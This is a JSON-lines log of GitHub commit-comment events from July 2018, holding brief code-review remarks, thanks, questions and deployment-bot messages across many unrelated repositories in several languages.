{"id":"7909768761","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29574244,"position":34,"line":88,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"7954cb531538b04bd942f26e104d1f8db7446915","created_at":"2018-07-03T01:44:22Z","updated_at":"2018-07-03T01:44:22Z","author_association":"COLLABORATOR","body":"if you get a `-1` just put an empty string, or the same \"N/A\".\r\n\r\nEnglish tip: It's \"I can't figure out why\" (present tense), you can say also \"I couldn't figure out why\" (past tense included in the \"could not\")"}},"created_at":"2018-07-03T01:44:22Z"}
{"id":"7909770516","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29574250,"position":34,"line":88,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"7954cb531538b04bd942f26e104d1f8db7446915","created_at":"2018-07-03T01:45:03Z","updated_at":"2018-07-03T01:45:03Z","author_association":"COLLABORATOR","body":"You could say: \"I figured it out\" and then you use the verbe in past tense."}},"created_at":"2018-07-03T01:45:03Z"}
{"id":"7909772894","type":"CommitCommentEvent","actor":{"login":"jackiechenlovely"},"repo":{"name":"jackiechenlovely/jackiechenlovely.github.io"},"payload":{"comment":{"id":29574255,"position":null,"line":null,"path":null,"commit_id":"8590c804a78182c1f4a4f7e07c1bfe4661a0eaf4","created_at":"2018-07-03T01:45:59Z","updated_at":"2018-07-03T01:45:59Z","author_association":"OWNER","body":"qw "}},"created_at":"2018-07-03T01:45:59Z"}
{"id":"7909773783","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29574257,"position":null,"line":null,"path":null,"commit_id":"1d7cc594e2d93c6baedd133aa5cebbf431e43915","created_at":"2018-07-03T01:46:20Z","updated_at":"2018-07-03T01:46:20Z","author_association":"CONTRIBUTOR","body":"Gracias colega."}},"created_at":"2018-07-03T01:46:20Z"}
{"id":"7909777896","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29574265,"position":null,"line":null,"path":null,"commit_id":"7a83aa0672f11df76d32e5bc81bee775de11ab66","created_at":"2018-07-03T01:47:57Z","updated_at":"2018-07-03T01:47:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-19](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-19-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T01:47:57Z"}
{"id":"7909778325","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29574266,"position":8,"line":17,"path":"monopoly.py","commit_id":"8c5d7c61852c3e370a4ff3267b3b35a14c6a47eb","created_at":"2018-07-03T01:48:07Z","updated_at":"2018-07-03T01:48:07Z","author_association":"NONE","body":"It's generally a bad idea to return two totally different types from a single function."}},"created_at":"2018-07-03T01:48:07Z"}
{"id":"7909779777","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29574267,"position":null,"line":null,"path":null,"commit_id":"8d5afd8f2f18a444ee3bc375b56745eb54a2b453","created_at":"2018-07-03T01:48:33Z","updated_at":"2018-07-03T01:48:33Z","author_association":"CONTRIBUTOR","body":"Gracias colega hacia tiempo que estaba ese Issue pendiente. "}},"created_at":"2018-07-03T01:48:33Z"}
{"id":"7909781866","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29574270,"position":84,"line":171,"path":"monopoly.py","commit_id":"8c5d7c61852c3e370a4ff3267b3b35a14c6a47eb","created_at":"2018-07-03T01:49:24Z","updated_at":"2018-07-03T01:49:24Z","author_association":"NONE","body":"Don't duplicate this: `if <something>.lower() in ['true', 'yes', 'y', 't', '1']:`\r\n\r\nMake a helper function."}},"created_at":"2018-07-03T01:49:24Z"}
{"id":"7909783260","type":"CommitCommentEvent","actor":{"login":"btzr-io"},"repo":{"name":"btzr-io/jelly-beats"},"payload":{"comment":{"id":29574272,"position":null,"line":null,"path":null,"commit_id":"ebcf55c67794fde1bee3d413a26c28d220e4e961","created_at":"2018-07-03T01:50:02Z","updated_at":"2018-07-03T01:50:02Z","author_association":"OWNER","body":"Closes https://github.com/btzr-io/jelly-beats/issues/17"}},"created_at":"2018-07-03T01:50:02Z"}
{"id":"7909783293","type":"CommitCommentEvent","actor":{"login":"jpmcruz"},"repo":{"name":"encryptogroup/ABY"},"payload":{"comment":{"id":29574273,"position":null,"line":null,"path":null,"commit_id":"01ee0dc86e9ceacf2687ebd2a2a2d2213bbbc2c5","created_at":"2018-07-03T01:50:03Z","updated_at":"2018-07-03T01:50:03Z","author_association":"NONE","body":"Thank you! "}},"created_at":"2018-07-03T01:50:03Z"}
{"id":"7909786428","type":"CommitCommentEvent","actor":{"login":"robouden"},"repo":{"name":"Safecast/ingest"},"payload":{"comment":{"id":29574274,"position":null,"line":null,"path":null,"commit_id":"bdaf534e07ee590a9ee40c27fd7aabba0e1975c0","created_at":"2018-07-03T01:51:18Z","updated_at":"2018-07-03T01:51:18Z","author_association":"CONTRIBUTOR","body":"great!!!"}},"created_at":"2018-07-03T01:51:18Z"}
{"id":"7909786845","type":"CommitCommentEvent","actor":{"login":"ron1"},"repo":{"name":"nuxeo-sandbox/nuxeo-apb-catalog"},"payload":{"comment":{"id":29574276,"position":572,"line":307,"path":"nuxeo-mongodb-apb/Dockerfile","commit_id":"f5e39c0296f7bf29c8229186f5f7785361832355","created_at":"2018-07-03T01:51:27Z","updated_at":"2018-07-03T01:51:27Z","author_association":"CONTRIBUTOR","body":"...Still waiting for a Dockerfile re-generation here to correct the git merge anomaly."}},"created_at":"2018-07-03T01:51:27Z"}
{"id":"7909787664","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29574279,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-03T01:51:46Z","updated_at":"2018-07-03T01:51:46Z","author_association":"NONE","body":"no. to get a good build, still needed to make extra copies of the ffmpeg includes, to the /usr/include folder so that the Xaudio would compile the dll"}},"created_at":"2018-07-03T01:51:46Z"}
{"id":"7909788658","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29574281,"position":98,"line":184,"path":"monopoly.py","commit_id":"8c5d7c61852c3e370a4ff3267b3b35a14c6a47eb","created_at":"2018-07-03T01:52:08Z","updated_at":"2018-07-03T01:52:08Z","author_association":"NONE","body":"We should look at the places where the code makes temporary instances of `Monopoly` and then throws them away (like right here). \r\n\r\nMaybe `roll_dice` should be a utility function?"}},"created_at":"2018-07-03T01:52:08Z"}
{"id":"7909790265","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29574283,"position":null,"line":null,"path":null,"commit_id":"fb9751c8180dfcfc5cf55e88829cdac2f9ce8248","created_at":"2018-07-03T01:52:46Z","updated_at":"2018-07-03T01:52:46Z","author_association":"CONTRIBUTOR","body":"Bienvenido de nuevo colega, toda ayuda es bienvenida y ahora mismo nos hace falta una manito con las Rules."}},"created_at":"2018-07-03T01:52:46Z"}
{"id":"7909792347","type":"CommitCommentEvent","actor":{"login":"dcminming"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29574285,"position":null,"line":null,"path":null,"commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-03T01:53:32Z","updated_at":"2018-07-03T01:53:32Z","author_association":"NONE","body":"I get error \"Cannot resolve symbol 'NumbersActivity'\" even though I do have an activity named NumbersActivity. NumbersActivity shows up in the Android Manifest and there's a java and xml file for it too. What am I missing?? \r\n \r\n![screenshot 5](https://user-images.githubusercontent.com/40705845/42194497-3d04b6ee-7e42-11e8-944c-58256d9e16bc.png)\r\n![screenshot 6](https://user-images.githubusercontent.com/40705845/42194507-4617ac78-7e42-11e8-8dc2-595618691333.png)\r\n\r\n"}},"created_at":"2018-07-03T01:53:32Z"}
{"id":"7909792480","type":"CommitCommentEvent","actor":{"login":"thash"},"repo":{"name":"thash/config"},"payload":{"comment":{"id":29574286,"position":null,"line":null,"path":null,"commit_id":"db019b6bb211a9bbd8b05388294214040c10c6c6","created_at":"2018-07-03T01:53:36Z","updated_at":"2018-07-03T01:53:36Z","author_association":"OWNER","body":"wrong commit message. actually it's not `$HOME`, I meant `$GOPATH/src`..."}},"created_at":"2018-07-03T01:53:36Z"}
{"id":"7909795374","type":"CommitCommentEvent","actor":{"login":"Jaiglissechef-i9100"},"repo":{"name":"7comp/android_vendor_resurrection"},"payload":{"comment":{"id":29574291,"position":null,"line":null,"path":null,"commit_id":"75c5e762142d0e2fd52db15fcec86b5aa4543adb","created_at":"2018-07-03T01:54:47Z","updated_at":"2018-07-03T01:54:47Z","author_association":"MEMBER","body":"Fix google play loop crash during the first install on the S4 mini"}},"created_at":"2018-07-03T01:54:47Z"}
{"id":"7909798019","type":"CommitCommentEvent","actor":{"login":"SMatsushi"},"repo":{"name":"SMatsushi/hpl-2.2"},"payload":{"comment":{"id":29574299,"position":null,"line":null,"path":null,"commit_id":"a883ff8d83e7c65273befefbc13ad95fd65520a2","created_at":"2018-07-03T01:55:50Z","updated_at":"2018-07-03T01:55:50Z","author_association":"OWNER","body":"The commit message 'Got 2.4TFlops' is wrong."}},"created_at":"2018-07-03T01:55:50Z"}
{"id":"7909799303","type":"CommitCommentEvent","actor":{"login":"winpzs"},"repo":{"name":"sip-dev/ng-crud-table"},"payload":{"comment":{"id":29574305,"position":null,"line":null,"path":null,"commit_id":"81a0f85c29c8ae1499ec49733a49c42580841a03","created_at":"2018-07-03T01:56:21Z","updated_at":"2018-07-03T01:56:21Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-03T01:56:21Z"}
{"id":"7909801840","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRom/frameworks_base"},"payload":{"comment":{"id":29574311,"position":null,"line":null,"path":null,"commit_id":"96ad58b34eb7d1e50fce74e55d8f3ab306953c94","created_at":"2018-07-03T01:57:18Z","updated_at":"2018-07-03T01:57:18Z","author_association":"CONTRIBUTOR","body":"@deletescape thank you for letting me know"}},"created_at":"2018-07-03T01:57:18Z"}
{"id":"7909803084","type":"CommitCommentEvent","actor":{"login":"Mahamatnour"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29574313,"position":null,"line":null,"path":null,"commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-03T01:57:49Z","updated_at":"2018-07-03T01:57:49Z","author_association":"NONE","body":"can you try like this way then try to clean or rebuild your code before run. \r\n\r\n    Intent i = new Intent(this, NumberActivity.class);\r\n    startActivity(i);"}},"created_at":"2018-07-03T01:57:49Z"}
{"id":"7909807242","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29574317,"position":3,"line":2,"path":"config/routes.rb","commit_id":"5c3f89efcf3e0ae5c014d73f625655fc03e0c48d","created_at":"2018-07-03T01:59:33Z","updated_at":"2018-07-03T01:59:33Z","author_association":"NONE","body":"Nên viết Hash syntax theo kiểu mới của Ruby.\r\nThay vì viết: `:foo => {:bar => 'bar'}`\r\nViết theo chuẩn mới: `foo: {bar: 'bar'}`"}},"created_at":"2018-07-03T01:59:33Z"}
{"id":"7911524001","type":"CommitCommentEvent","actor":{"login":"kinipranav"},"repo":{"name":"kinipranav/bigData"},"payload":{"comment":{"id":29578231,"position":null,"line":null,"path":null,"commit_id":"ef4a004ee40ff233c7d60a78e881bce6dac883a6","created_at":"2018-07-03T10:00:11Z","updated_at":"2018-07-03T10:00:11Z","author_association":"OWNER","body":"Apache Drill cheatsheet"}},"created_at":"2018-07-03T10:00:11Z"}
{"id":"7911531111","type":"CommitCommentEvent","actor":{"login":"DeckOfPandas"},"repo":{"name":"openhealthcare/elcid.openhealthcare.org.uk"},"payload":{"comment":{"id":29578246,"position":null,"line":null,"path":null,"commit_id":"98f0e83c7651a56939f870ddb0e4a817972a929f","created_at":"2018-07-03T10:01:26Z","updated_at":"2018-07-03T10:01:26Z","author_association":"NONE","body":"(My computer is currently sad and I am backing up with a view to reinstalling today, and I don't want to confuse it by downloading things,)\r\n\r\n\"high level\" --> \"high-level\"\r\n\r\n\"Import data from other systems and integrate it fully with your records; for example demographics, test results, prescribing data and more.\""}},"created_at":"2018-07-03T10:01:26Z"}
{"id":"7911532637","type":"CommitCommentEvent","actor":{"login":"KENCHjp"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29578250,"position":56,"line":56,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-03T10:01:42Z","updated_at":"2018-07-03T10:01:42Z","author_association":"MEMBER","body":">個人的にはファイル内で一貫されたルールが採られていればどっちでも良いです。\r\n\r\n同意。避暑地ネタっすかね。\r\n確かにそのリンク先のnamespaceのインデント気持ち悪いっすねぇ。"}},"created_at":"2018-07-03T10:01:42Z"}
{"id":"7911533323","type":"CommitCommentEvent","actor":{"login":"sureshhmrc"},"repo":{"name":"hmrc/help-to-save-api"},"payload":{"comment":{"id":29578253,"position":64,"line":168,"path":"app/uk/gov/hmrc/helptosaveapi/services/HelpToSaveApiService.scala","commit_id":"30d0d9743a30d09cfe3cda697ef338c15d5d02c6","created_at":"2018-07-03T10:01:51Z","updated_at":"2018-07-03T10:01:51Z","author_association":"CONTRIBUTOR","body":"have we added this new alert to the `alert-config` ? "}},"created_at":"2018-07-03T10:01:51Z"}
{"id":"7911535665","type":"CommitCommentEvent","actor":{"login":"sjrd"},"repo":{"name":"scala-js/scala-js"},"payload":{"comment":{"id":29578261,"position":null,"line":null,"path":null,"commit_id":"caaf3a947ca37ec49447b8b12633de7a1d70fced","created_at":"2018-07-03T10:02:18Z","updated_at":"2018-07-03T10:02:18Z","author_association":"MEMBER","body":"On its way to Maven Central."}},"created_at":"2018-07-03T10:02:18Z"}
{"id":"7911535928","type":"CommitCommentEvent","actor":{"login":"JunreyCen"},"repo":{"name":"vuejs/component-compiler-utils"},"payload":{"comment":{"id":29578263,"position":null,"line":null,"path":null,"commit_id":"3b19c1e6108d61a0a4365a8605350088754b0403","created_at":"2018-07-03T10:02:21Z","updated_at":"2018-07-03T10:02:21Z","author_association":"NONE","body":"Excuse me, can the new version with this commit be published as soon as possible?"}},"created_at":"2018-07-03T10:02:21Z"}
{"id":"7911537391","type":"CommitCommentEvent","actor":{"login":"shishaofeng"},"repo":{"name":"shishaofeng/hello"},"payload":{"comment":{"id":29578267,"position":null,"line":null,"path":null,"commit_id":"fb195eaaf1c9e16a6e95a823aae09a6b077f994d","created_at":"2018-07-03T10:02:38Z","updated_at":"2018-07-03T10:02:38Z","author_association":"OWNER","body":"console.log('helloWord');"}},"created_at":"2018-07-03T10:02:38Z"}
{"id":"7911539111","type":"CommitCommentEvent","actor":{"login":"abdouxnew"},"repo":{"name":"SPCSR/DisplayTemplates"},"payload":{"comment":{"id":29578268,"position":null,"line":null,"path":null,"commit_id":"db0c67c59ab8ba7e0b79fd43f05d9cba14f0de95","created_at":"2018-07-03T10:02:59Z","updated_at":"2018-07-03T10:02:59Z","author_association":"NONE","body":"Hi,\r\nThanks for your help.\r\nI downloaded the files, I used web part content search, I followed your instructions, and I got these error messages as an attachment\r\n![image](https://user-images.githubusercontent.com/40791624/42213439-02710f9c-7eb9-11e8-9f58-58d5e622915c.png)\r\n"}},"created_at":"2018-07-03T10:02:59Z"}
{"id":"7911539816","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/boost_graph_cookbook_1"},"payload":{"comment":{"id":29578269,"position":null,"line":null,"path":null,"commit_id":"31437fe61e81770c6c2b457205a3f376263ee6e6","created_at":"2018-07-03T10:03:08Z","updated_at":"2018-07-03T10:03:08Z","author_association":"OWNER","body":"I do dislike the binning of parameters.\r\n\r\nFor example, I prefer the unbinned form of:\r\n\r\n```c++\r\nboost::adjacency_list<\r\n  boost::vecS, boost::vecS, \r\n  boost::undirectedS,\r\n  my_bundled_vertex\r\n>\r\ncreate_empty_undirected_bundled_vertices_graph() noexcept;\r\n```\r\n\r\nover this form:\r\n\r\n```c++\r\nboost::adjacency_list<boost::vecS, boost::vecS, boost::undirectedS,\r\n  my_bundled_vertex>\r\ncreate_empty_undirected_bundled_vertices_graph() noexcept;\r\n```\r\n\r\nWhich form do you prefer @mywtfmp3? Whatever you pick, I will follow."}},"created_at":"2018-07-03T10:03:08Z"}
{"id":"7911565363","type":"CommitCommentEvent","actor":{"login":"jpayne23"},"repo":{"name":"jpayne23/simple-20180703095816141"},"payload":{"comment":{"id":29578301,"position":null,"line":null,"path":null,"commit_id":"6a351bb9e24bddd8c6e35850598616c3fe2f1391","created_at":"2018-07-03T10:07:55Z","updated_at":"2018-07-03T10:07:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/a0ae9129-3ffc-4bf7-ac2b-05cb89d1c153?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/3c4f475e-d3f4-42fe-b3f9-fec43b342edd?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\") deployed [simple-20180703095816141](https://github.com/jpayne23/simple-20180703095816141/releases/tag/deploy-ibm-yp-eu-gb-joseph.payne-staging-20180703-100754 \"deploy-ibm-yp-eu-gb-joseph.payne-staging-20180703-100754\") to [staging](https://console.bluemix.net/apps/31a6fe56-bf65-4f37-9cd5-a97e8a14c1c1?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:joseph.payne:staging\"), including this commit"}},"created_at":"2018-07-03T10:07:55Z"}
{"id":"7911565604","type":"CommitCommentEvent","actor":{"login":"andreisaniuk"},"repo":{"name":"dev-haran/android_device_xiaomi_santoni"},"payload":{"comment":{"id":29578302,"position":null,"line":null,"path":null,"commit_id":"54b7e08b331ef39734d91150964f02b80faa6e2a","created_at":"2018-07-03T10:07:58Z","updated_at":"2018-07-03T10:07:58Z","author_association":"CONTRIBUTOR","body":"Some mess here"}},"created_at":"2018-07-03T10:07:58Z"}
{"id":"7911573829","type":"CommitCommentEvent","actor":{"login":"dingbin90"},"repo":{"name":"dingbin90/crm_db"},"payload":{"comment":{"id":29578322,"position":null,"line":null,"path":null,"commit_id":"4f1a59bb83eea5a70cbfd7e1458ee6f40cee5e73","created_at":"2018-07-03T10:09:35Z","updated_at":"2018-07-03T10:09:35Z","author_association":"OWNER","body":"学生报名流程的开发"}},"created_at":"2018-07-03T10:09:35Z"}
{"id":"7911575917","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29578323,"position":null,"line":null,"path":null,"commit_id":"e9bcba7e52c852d141676784337950efee9eb6c5","created_at":"2018-07-03T10:10:00Z","updated_at":"2018-07-03T10:10:00Z","author_association":"OWNER","body":"Is this for me?\r\n\r\nThe video playlist recommended by Yves Muya-Benda made it easier for me to start exploring github and figure out if it is right for me.\r\nhttps://www.youtube.com/watch?v=BCQHnlnPusY\r\n\r\n#1 "}},"created_at":"2018-07-03T10:10:00Z"}
{"id":"7911579867","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/BalazsSalfay"},"payload":{"comment":{"id":29578328,"position":null,"line":null,"path":null,"commit_id":"bfd83a62f58e02b272e346ca04a56153f915a972","created_at":"2018-07-03T10:10:47Z","updated_at":"2018-07-03T10:10:47Z","author_association":"NONE","body":"Ocelot udvozol, loptam a kodot, valamikor tenyleg sorozni kellene ;) "}},"created_at":"2018-07-03T10:10:47Z"}
{"id":"7911581048","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29578331,"position":355,"line":2139,"path":"Zend/zend_hash.c","commit_id":"d7f2dc4ec651628e10213625db6aee3559e214a9","created_at":"2018-07-03T10:11:01Z","updated_at":"2018-07-03T10:11:01Z","author_association":"CONTRIBUTOR","body":"This causes unexpected behaviour when moving forward on a HT which does not have an index 0 (if it was deleted for example, like [this code](https://github.com/pmmp/pthreads/blob/fork73/src/store.c#L489-L504)). If moving forward from index `0` (non existing) where the first existing position is `1`, `move_forward` will now move the position to `2` instead of the expected `1`, skipping `1` completely (because of the below `idx++`). All other cases behave as expected.\r\n\r\nI don't know if that's behaviour you might want to consider fixing, or if such behaviour would have been considered undefined."}},"created_at":"2018-07-03T10:11:01Z"}
{"id":"7911581333","type":"CommitCommentEvent","actor":{"login":"jgangso"},"repo":{"name":"webbisivut/wb-klarna-pickup"},"payload":{"comment":{"id":29578332,"position":null,"line":null,"path":null,"commit_id":"9d8f31ce86e0074fbd9b466729f1dc1af032e7b8","created_at":"2018-07-03T10:11:05Z","updated_at":"2018-07-03T10:11:05Z","author_association":"NONE","body":"Moro, \r\n\r\nTää tuntuu vähän ongelmalliselta, jos kassalla valitaan automaattisesti eka radio buttoni ilman että tsekataan onko joku toimitustapa jo valittu.\r\n\r\nTarkoitan esim. tilannetta, jos ostoskori-sivulla valitsee toimitustavan ja siirtyy kassa-sivulle, missä se huomaamatta vaihtuu taas oletusvaihtoehtoon(ylimpään).\r\n\r\nOnksulla mitää ajatusta tähän liittyen, tai onkohan mulla joku asetus väärin jossain?\r\n\r\nJohannes"}},"created_at":"2018-07-03T10:11:05Z"}
{"id":"7911582401","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29578337,"position":278,"line":514,"path":"tests/qgraph/test-qgraph.c","commit_id":"1bcb88e173970ab3e1c2362ee631e64691b1eb02","created_at":"2018-07-03T10:11:16Z","updated_at":"2018-07-03T10:11:16Z","author_association":"OWNER","body":"The problem is that I did not understand what you like/don't like from the tests. \r\nI left everything as it was before, so the constructor will call qos_create_machine_pc() that will call qos_create_i440FX_host() (for i440-fx-host) and then qpci_set_pc, that's why. \r\nShould I remove the QOSGraphObject creations?"}},"created_at":"2018-07-03T10:11:16Z"}
{"id":"7911587995","type":"CommitCommentEvent","actor":{"login":"FlinteW"},"repo":{"name":"FlinteW/udemy-heroes"},"payload":{"comment":{"id":29578351,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-03T10:12:23Z","updated_at":"2018-07-03T10:12:23Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano favorito"}},"created_at":"2018-07-03T10:12:23Z"}
{"id":"7911589320","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29578358,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T10:12:39Z","updated_at":"2018-07-03T10:12:39Z","author_association":"OWNER","body":"\r\n[f03072018101226_download.txt](https://github.com/githubuserdlp/TEST/files/2158762/f03072018101226_download.txt)\r\n"}},"created_at":"2018-07-03T10:12:39Z"}
{"id":"7911597143","type":"CommitCommentEvent","actor":{"login":"yxmline"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29578387,"position":null,"line":null,"path":null,"commit_id":"490c7e917cd464c42cea81e9bffea8d57989549e","created_at":"2018-07-03T10:14:13Z","updated_at":"2018-07-03T10:14:13Z","author_association":"NONE","body":"Create a folder for WiFi to generate pcap files or use system temporary folders, so storing pcap files in local folders looks chaotic."}},"created_at":"2018-07-03T10:14:13Z"}
{"id":"7911602231","type":"CommitCommentEvent","actor":{"login":"bitraid"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29578403,"position":null,"line":null,"path":null,"commit_id":"0af8eec73a8a4290b0a0348f3ad8d8295e17deaa","created_at":"2018-07-03T10:15:13Z","updated_at":"2018-07-03T10:15:13Z","author_association":"CONTRIBUTOR","body":"The  makensis 32bit call is still there..."}},"created_at":"2018-07-03T10:15:13Z"}
{"id":"7911603307","type":"CommitCommentEvent","actor":{"login":"AdJIa"},"repo":{"name":"AdJIa/robopost"},"payload":{"comment":{"id":29578407,"position":null,"line":null,"path":null,"commit_id":"ce0f4d795dbc9099d50805785801f58180bb29cf","created_at":"2018-07-03T10:15:26Z","updated_at":"2018-07-03T10:15:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2018-07](https://trello.com/c/uclC8aVb/92-2018-07)"}},"created_at":"2018-07-03T10:15:26Z"}
{"id":"7911604167","type":"CommitCommentEvent","actor":{"login":"dima-chebotar"},"repo":{"name":"dima-chebotar/gallery"},"payload":{"comment":{"id":29578410,"position":65,"line":65,"path":"public/js/main.js","commit_id":"c95e3428c24ed30d6c1cb4fd63b5d15a2326fa90","created_at":"2018-07-03T10:15:36Z","updated_at":"2018-07-03T10:15:36Z","author_association":"OWNER","body":"1. Тут формується пагінація та по кліку на пагінацію відправляється ajax номер сторінки на якій перебуває користувач."}},"created_at":"2018-07-03T10:15:36Z"}
{"id":"7911604635","type":"CommitCommentEvent","actor":{"login":"anigamova"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29578414,"position":461,"line":561,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"04496f4c663dc1f77bf10fca6f340766700cc652","created_at":"2018-07-03T10:15:43Z","updated_at":"2018-07-03T10:15:43Z","author_association":"NONE","body":"This has to be fixed to DiMuMass_.numerator ->Fill(DiMuMass, PrescaleWeight);\r\nI think I fixed it in later commits (after \"adding detach requirement\")"}},"created_at":"2018-07-03T10:15:43Z"}
{"id":"7911619420","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/boost_graph_cookbook_1"},"payload":{"comment":{"id":29578438,"position":null,"line":null,"path":null,"commit_id":"31437fe61e81770c6c2b457205a3f376263ee6e6","created_at":"2018-07-03T10:18:45Z","updated_at":"2018-07-03T10:18:45Z","author_association":"OWNER","body":"OTOH. for a tutorial, the binned form takes up less space, thus is preferable :+1:\r\n\r\nWill use the binned form :rainbow: "}},"created_at":"2018-07-03T10:18:45Z"}
{"id":"7911621945","type":"CommitCommentEvent","actor":{"login":"DeckOfPandas"},"repo":{"name":"openhealthcare/elcid.openhealthcare.org.uk"},"payload":{"comment":{"id":29578443,"position":null,"line":null,"path":null,"commit_id":"2daa269cea3e07ca6539d04446a857d51ff878ed","created_at":"2018-07-03T10:19:15Z","updated_at":"2018-07-03T10:19:15Z","author_association":"NONE","body":"Can't check ofc, but lgtm"}},"created_at":"2018-07-03T10:19:15Z"}
{"id":"7911622762","type":"CommitCommentEvent","actor":{"login":"svdoldie"},"repo":{"name":"diddipoeler/sportsmanagement"},"payload":{"comment":{"id":29578446,"position":null,"line":null,"path":null,"commit_id":"9eb67f5871b91315e24976537d4c67f3639dde93","created_at":"2018-07-03T10:19:25Z","updated_at":"2018-07-03T10:19:25Z","author_association":"CONTRIBUTOR","body":"läuft :-)"}},"created_at":"2018-07-03T10:19:25Z"}
{"id":"7911626714","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29578454,"position":null,"line":null,"path":null,"commit_id":"82a4249772785d7b68e9d533f7904fbaca850af0","created_at":"2018-07-03T10:20:12Z","updated_at":"2018-07-03T10:20:12Z","author_association":"COLLABORATOR","body":"Cintributions :100: :ok_hand:"}},"created_at":"2018-07-03T10:20:12Z"}
{"id":"7911628218","type":"CommitCommentEvent","actor":{"login":"FulcrumA"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29578456,"position":null,"line":null,"path":null,"commit_id":"031e94619f43183976c7487f3c80033aaab53fc9","created_at":"2018-07-03T10:20:29Z","updated_at":"2018-07-03T10:20:29Z","author_association":"NONE","body":"Very nice addition but now that we have it, probably plants like berry bushes should be adjusted to not drop seeds separate from the fruits upon harvest."}},"created_at":"2018-07-03T10:20:29Z"}
{"id":"7911629361","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578459,"position":6,"line":6,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T10:20:43Z","updated_at":"2018-07-03T10:20:43Z","author_association":"NONE","body":"В тексте написано что название таблицы задается во множественном числе, а в примерах написано в единественном"}},"created_at":"2018-07-03T10:20:43Z"}
{"id":"7911630856","type":"CommitCommentEvent","actor":{"login":"OcelotDive"},"repo":{"name":"OcelotDive/proto"},"payload":{"comment":{"id":29578463,"position":6,"line":10,"path":"index.html","commit_id":"6546fa0627f9f9c2b0973e6ed6c78e1ba0ac7bd3","created_at":"2018-07-03T10:21:01Z","updated_at":"2018-07-03T10:21:01Z","author_association":"OWNER","body":"this line can be removed"}},"created_at":"2018-07-03T10:21:01Z"}
